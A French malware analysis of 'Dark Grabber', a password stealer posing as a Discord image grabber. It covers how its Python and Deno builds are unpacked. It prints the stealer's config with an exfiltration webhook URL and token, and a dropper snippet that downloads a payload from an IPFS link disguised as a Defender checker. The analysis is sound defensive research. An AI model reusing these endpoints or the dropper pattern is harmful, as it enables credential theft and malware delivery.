# Dark Grabber

C'est un password stealer qui se fait passer pour un "Image grabber discord", il est distribué par **! 刀3ズ GMB#3666** sur discord notamment.

Il existe deux versions du stealer, une appelée "Debug" et une "Normale".
<br>
Les deux sont dans le même .zip et les admins demandent de les lancer les deux.

*insérer une capture*

## Version Normale

Elle est appelée "Install Dark Grabber.bin".
<br>
[Virustotal](https://www.virustotal.com/gui/file/8a12f091c08d2287409465e04c15d1ce53da419b626565a8e783e22bbe2368f4)<br>
C'est du Python 3.10 compilé avec pyinstaller.<br>
On peut utiliser [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor) avec [pycdc](https://github.com/zrax/pycdc) pour retrouver la source.
<br>
On extrait les fichiers :
* antidebug.py
* browsers.py
* config.py
* discordtoken.py
* injection.py
* 'Install Dark Grabber'.py
* startup.py
* systeminfo.py

Les fichiers sont dans [l'annexe.](https://github.com/ALittlePatate/Malware-Research/tree/master/Random/Dark%20Grabber/Annexe)

C'est un stealer python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord.

La config :
```Python
__CONFIG__ = {
    'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp',
    'antidebug': True,
    'browsers': True,
    'discordtoken': True,
    'injection': True,
    'startup': True,
    'systeminfo': True }
```

## Version Debug

Le fichier est appelé "Install Debug Dark Grabber", le nom original est "deno.exe".
<br>
[Virustotal](https://www.virustotal.com/gui/file/c5e5db042d3a3e12b8484f29594d157268e3c63631f3a0ffd588ff7ad1d42e2f)
<br>

C'est du typescript compilé avec [deno](https://deno.land/), il n'existe pas d'extracteur pour deno mais il stocke le code en clair dans l'exe. On peut le dump avec un éditeur hexadécimal comme [HxD](https://mh-nexus.de/en/hxd/).
<br>
On extrait le code ci dessous dans **main.ts** :
```typescript
import { download, Destination } from "https://deno.land/x/download/mod.ts";

await download("https://bafybeid7gnnacqshr64a6rpn6wevtexbw7kpiv2ckkrcdtnnmdtvd35j2e.ipfs.nftstorage.link/ikiyq", destination);
```

Ce code va télécharger ikiyq.exe et l'enregistrer sur le disque à `C:/Users/${username}/` sous le nom `Microsoft-Defender-Checker.exe`.

`Microsoft-Defender-Checker.exe` est une dropper avec quelques decoys, il va drop `ikiyq.exe` qui est le stage final.<br>
[Virustotal de ikiyq.exe](https://www.virustotal.com/gui/file/392a8b2d7633da3a89247681ee1161a93f872d5a9ecee88ef8ed6e578225b71d)<br>
Pour finir, `ikiyq.exe` est du Python compilé avec [Nuitka](https://github.com/Nuitka/Nuitka).